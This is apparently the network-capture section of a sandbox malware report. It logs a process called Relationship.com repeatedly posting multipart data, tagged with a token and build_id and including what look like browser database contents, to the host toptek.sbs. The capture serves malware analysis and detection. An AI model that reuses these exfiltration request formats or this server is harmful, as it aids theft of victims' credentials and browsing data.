                                                                                                                                                                                                                                                                          Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
2024-12-22 21:48:01 UTC | 158 | IN | HTTP/1.1 200 OK
Server: nginx
Date: Sun, 22 Dec 2024 21:48:01 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: close
2024-12-22 21:48:01 UTC | 12 | IN | Data Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a
Data Ascii: 2ok0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
16 | 192.168.2.4 | 49776 | 94.130.188.57 | 443 | 7576 | C:\Users\user\AppData\Local\Temp\523266\Relationship.com
Timestamp | Bytes transferred | Direction | Data
2024-12-22 21:48:01 UTC | 322 | OUT | POST / HTTP/1.1
Content-Type: multipart/form-data; boundary=----JE3OPZM79H47QI589ZCB
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 OPR/116.0.0.0
Host: toptek.sbs
Content-Length: 493
Connection: Keep-Alive
Cache-Control: no-cache
2024-12-22 21:48:01 UTC | 493 | OUT | Data Raw: 2d 2d 2d 2d 2d 2d 4a 45 33 4f 50 5a 4d 37 39 48 34 37 51 49 35 38 39 5a 43 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 61 34 35 36 32 38 64 35 36 35 31 33 31 30 32 61 63 38 31 63 34 63 66 39 39 31 32 32 61 35 31 32 0d 0a 2d 2d 2d 2d 2d 2d 4a 45 33 4f 50 5a 4d 37 39 48 34 37 51 49 35 38 39 5a 43 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 63 31 34 30 30 66 31 31 35 31 33 31 65 31 66 61 38 34 65 61 39 38 35 39 39 64 35 33 64 30 62 64 0d 0a 2d 2d 2d 2d 2d 2d 4a 45 33 4f 50 5a 4d 37 39 48 34 37 51 49 35 38 39 5a 43 42 0d 0a 43 6f 6e 74
Data Ascii: ------JE3OPZM79H47QI589ZCBContent-Disposition: form-data; name="token"a45628d56513102ac81c4cf99122a512------JE3OPZM79H47QI589ZCBContent-Disposition: form-data; name="build_id"c1400f115131e1fa84ea98599d53d0bd------JE3OPZM79H47QI589ZCBCont
2024-12-22 21:48:02 UTC | 158 | IN | HTTP/1.1 200 OK
Server: nginx
Date: Sun, 22 Dec 2024 21:48:01 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: close
2024-12-22 21:48:02 UTC | 12 | IN | Data Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a
Data Ascii: 2ok0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
17 | 192.168.2.4 | 49782 | 94.130.188.57 | 443 | 7576 | C:\Users\user\AppData\Local\Temp\523266\Relationship.com
Timestamp | Bytes transferred | Direction | Data
2024-12-22 21:48:04 UTC | 325 | OUT | POST / HTTP/1.1
Content-Type: multipart/form-data; boundary=----Q1NGDT0R9H4EU37QIMYM
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 OPR/116.0.0.0
Host: toptek.sbs
Content-Length: 169765
Connection: Keep-Alive
Cache-Control: no-cache
2024-12-22 21:48:04 UTC | 16355 | OUT | Data Raw: 2d 2d 2d 2d 2d 2d 51 31 4e 47 44 54 30 52 39 48 34 45 55 33 37 51 49 4d 59 4d 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 61 34 35 36 32 38 64 35 36 35 31 33 31 30 32 61 63 38 31 63 34 63 66 39 39 31 32 32 61 35 31 32 0d 0a 2d 2d 2d 2d 2d 2d 51 31 4e 47 44 54 30 52 39 48 34 45 55 33 37 51 49 4d 59 4d 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 63 31 34 30 30 66 31 31 35 31 33 31 65 31 66 61 38 34 65 61 39 38 35 39 39 64 35 33 64 30 62 64 0d 0a 2d 2d 2d 2d 2d 2d 51 31 4e 47 44 54 30 52 39 48 34 45 55 33 37 51 49 4d 59 4d 0d 0a 43 6f 6e 74
Data Ascii: ------Q1NGDT0R9H4EU37QIMYMContent-Disposition: form-data; name="token"a45628d56513102ac81c4cf99122a512------Q1NGDT0R9H4EU37QIMYMContent-Disposition: form-data; name="build_id"c1400f115131e1fa84ea98599d53d0bd------Q1NGDT0R9H4EU37QIMYMCont
                                                                                                                                                                                                                                                                          2024-12-22 21:48:04 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                                          Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                                          2024-12-22 21:48:04 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                                          Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                                          2024-12-22 21:48:04 UTC16355OUTData Raw: 55 67 51 6b 39 50 54 45 56 42 54 69 42 45 52 55 5a 42 56 55 78 55 49 45 5a 42 54 46 4e 46 49 45 35 50 56 43 42 4f 56 55 78 4d 4b 56 41 45 42 68 63 72 4b 77 46 5a 64 47 46 69 62 47 56 7a 63 57 78 70 64 47 56 66 63 32 56 78 64 57 56 75 59 32 56 7a 63 57 78 70 64 47 56 66 63 32 56 78 64 57 56 75 59 32 55 46 51 31 4a 46 51 56 52 46 49 46 52 42 51 6b 78 46 49 48 4e 78 62 47 6c 30 5a 56 39 7a 5a 58 46 31 5a 57 35 6a 5a 53 68 75 59 57 31 6c 4c 48 4e 6c 63 53 6d 42 66 77 4d 48 46 78 55 56 41 59 4e 68 64 47 46 69 62 47 56 31 63 6d 78 7a 64 58 4a 73 63 77 52 44 55 6b 56 42 56 45 55 67 56 45 46 43 54 45 55 67 64 58 4a 73 63 79 68 70 5a 43 42 4a 54 6c 52 46 52 30 56 53 49 46 42 53 53 55 31 42 55 6c 6b 67 53 30 56 5a 49 45 46 56 56 45 39 4a 54 6b 4e 53 52 55 31 46 54
                                                                                                                                                                                                                                                                          Data Ascii: UgQk9PTEVBTiBERUZBVUxUIEZBTFNFIE5PVCBOVUxMKVAEBhcrKwFZdGFibGVzcWxpdGVfc2VxdWVuY2VzcWxpdGVfc2VxdWVuY2UFQ1JFQVRFIFRBQkxFIHNxbGl0ZV9zZXF1ZW5jZShuYW1lLHNlcSmBfwMHFxUVAYNhdGFibGV1cmxzdXJscwRDUkVBVEUgVEFCTEUgdXJscyhpZCBJTlRFR0VSIFBSSU1BUlkgS0VZIEFVVE9JTkNSRU1FT
2024-12-22 21:48:05 UTC | 158 | IN | HTTP/1.1 200 OK
Server: nginx
Date: Sun, 22 Dec 2024 21:48:05 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: close


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
18 | 192.168.2.4 | 49788 | 94.130.188.57 | 443 | 7576 | C:\Users\user\AppData\Local\Temp\523266\Relationship.com
Timestamp | Bytes transferred | Direction | Data
2024-12-22 21:48:05 UTC | 324 | OUT | POST / HTTP/1.1
Content-Type: multipart/form-data; boundary=----Q1NGDT0R9H4EU37QIMYM
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 OPR/116.0.0.0
Host: toptek.sbs
Content-Length: 66001
Connection: Keep-Alive
Cache-Control: no-cache
2024-12-22 21:48:05 UTC | 16355 | OUT | Data Ascii:
------Q1NGDT0R9H4EU37QIMYM
Content-Disposition: form-data; name="token"

a45628d56513102ac81c4cf99122a512
------Q1NGDT0R9H4EU37QIMYM
Content-Disposition: form-data; name="build_id"

c1400f115131e1fa84ea98599d53d0bd
------Q1NGDT0R9H4EU37QIMYM
Cont
2024-12-22 21:48:06 UTC | 158 | IN | HTTP/1.1 200 OK
Server: nginx
Date: Sun, 22 Dec 2024 21:48:06 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: close
2024-12-22 21:48:06 UTC | 12 | IN | Data Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a
Data Ascii: 2ok0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
19 | 192.168.2.4 | 49794 | 94.130.188.57 | 443 | 7576 | C:\Users\user\AppData\Local\Temp\523266\Relationship.com
Timestamp | Bytes transferred | Direction | Data
2024-12-22 21:48:08 UTC | 325 | OUT | POST / HTTP/1.1
Content-Type: multipart/form-data; boundary=----8Y5FCTR900ZM7YC2NO8Q
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 OPR/116.0.0.0
Host: toptek.sbs
Content-Length: 153381
Connection: Keep-Alive
Cache-Control: no-cache
2024-12-22 21:48:08 UTC | 16355 | OUT | Data Ascii:
------8Y5FCTR900ZM7YC2NO8Q
Content-Disposition: form-data; name="token"

a45628d56513102ac81c4cf99122a512
------8Y5FCTR900ZM7YC2NO8Q
Content-Disposition: form-data; name="build_id"

c1400f115131e1fa84ea98599d53d0bd
------8Y5FCTR900ZM7YC2NO8Q
Cont
                                                                                                                                                                                                                                                                          2024-12-22 21:48:08 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                                          Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                                          2024-12-22 21:48:08 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                                          Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                                          2024-12-22 21:48:08 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                                          Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                                          2024-12-22 21:48:08 UTC6186OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                                          Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
2024-12-22 21:48:09 UTC | 158 | IN | HTTP/1.1 200 OK
Server: nginx
Date: Sun, 22 Dec 2024 21:48:09 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: close


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
20 | 192.168.2.4 | 49800 | 94.130.188.57 | 443 | 7576 | C:\Users\user\AppData\Local\Temp\523266\Relationship.com

Timestamp | Bytes transferred | Direction | Data
2024-12-22 21:48:09 UTC | 325 | OUT | POST / HTTP/1.1
Content-Type: multipart/form-data; boundary=----D2NGDJWL6P8QQQ1DBIMG
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 OPR/116.0.0.0
Host: toptek.sbs
Content-Length: 393697
Connection: Keep-Alive
Cache-Control: no-cache
2024-12-22 21:48:09 UTC | 16355 | OUT | Data Ascii: ------D2NGDJWL6P8QQQ1DBIMGContent-Disposition: form-data; name="token"a45628d56513102ac81c4cf99122a512------D2NGDJWL6P8QQQ1DBIMGContent-Disposition: form-data; name="build_id"c1400f115131e1fa84ea98599d53d0bd------D2NGDJWL6P8QQQ1DBIMGCont
2024-12-22 21:48:11 UTC | 158 | IN | HTTP/1.1 200 OK
Server: nginx
Date: Sun, 22 Dec 2024 21:48:11 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: close


Session ID: 21
Source IP: 192.168.2.4
Source Port: 49806
Destination IP: 94.130.188.57
Destination Port: 443
PID: 7576
Process: C:\Users\user\AppData\Local\Temp\523266\Relationship.com

Timestamp | Bytes transferred | Direction | Data
2024-12-22 21:48:12 UTC | 325 | OUT | POST / HTTP/1.1
Content-Type: multipart/form-data; boundary=----A1N7QIE37YCBAAA1VKN7
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 OPR/116.0.0.0
Host: toptek.sbs
Content-Length: 131557
Connection: Keep-Alive
Cache-Control: no-cache
2024-12-22 21:48:12 UTC | 16355 | OUT | Data Ascii:
------A1N7QIE37YCBAAA1VKN7
Content-Disposition: form-data; name="token"

a45628d56513102ac81c4cf99122a512
------A1N7QIE37YCBAAA1VKN7
Content-Disposition: form-data; name="build_id"

c1400f115131e1fa84ea98599d53d0bd
------A1N7QIE37YCBAAA1VKN7
Cont
2024-12-22 21:48:14 UTC | 158 | IN | HTTP/1.1 200 OK
Server: nginx
Date: Sun, 22 Dec 2024 21:48:13 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: close
2024-12-22 21:48:14 UTC | 12 | IN | Data Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a
Data Ascii: 2ok0


Session ID: 22
Source IP: 192.168.2.4
Source Port: 49811
Destination IP: 94.130.188.57
Destination Port: 443
PID: 7576
Process: C:\Users\user\AppData\Local\Temp\523266\Relationship.com

Timestamp | Bytes transferred | Direction | Data
2024-12-22 21:48:13 UTC | 326 | OUT | POST / HTTP/1.1
Content-Type: multipart/form-data; boundary=----Z5PPP8Q1NYCBIE3EUKXL
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 OPR/116.0.0.0
Host: toptek.sbs
Content-Length: 6990993
Connection: Keep-Alive
Cache-Control: no-cache
2024-12-22 21:48:13 UTC | 16355 | OUT | Data Ascii:
------Z5PPP8Q1NYCBIE3EUKXL
Content-Disposition: form-data; name="token"

a45628d56513102ac81c4cf99122a512
------Z5PPP8Q1NYCBIE3EUKXL
Content-Disposition: form-data; name="build_id"

c1400f115131e1fa84ea98599d53d0bd
------Z5PPP8Q1NYCBIE3EUKXL
Cont
                                                                                                                                                                                                                                                                          Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                                          2024-12-22 21:48:13 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                                          Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                                          2024-12-22 21:48:13 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                                          Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
2024-12-22 21:48:20 UTC | 158 | IN | HTTP/1.1 200 OK
Server: nginx
Date: Sun, 22 Dec 2024 21:48:20 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: close


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
23 | 192.168.2.4 | 49812 | 94.130.188.57 | 443 | 7576 | C:\Users\user\AppData\Local\Temp\523266\Relationship.com
Timestamp | Bytes transferred | Direction | Data
2024-12-22 21:48:15 UTC | 322 | OUT | POST / HTTP/1.1
Content-Type: multipart/form-data; boundary=----8QQ9HVKF37QIE3EUKXLF
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 OPR/116.0.0.0
Host: toptek.sbs
Content-Length: 331
Connection: Keep-Alive
Cache-Control: no-cache
2024-12-22 21:48:15 UTC | 331 | OUT | Data Ascii: ------8QQ9HVKF37QIE3EUKXLFContent-Disposition: form-data; name="token"a45628d56513102ac81c4cf99122a512------8QQ9HVKF37QIE3EUKXLFContent-Disposition: form-data; name="build_id"c1400f115131e1fa84ea98599d53d0bd------8QQ9HVKF37QIE3EUKXLFCont
2024-12-22 21:48:16 UTC | 158 | IN | HTTP/1.1 200 OK
Server: nginx
Date: Sun, 22 Dec 2024 21:48:16 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: close
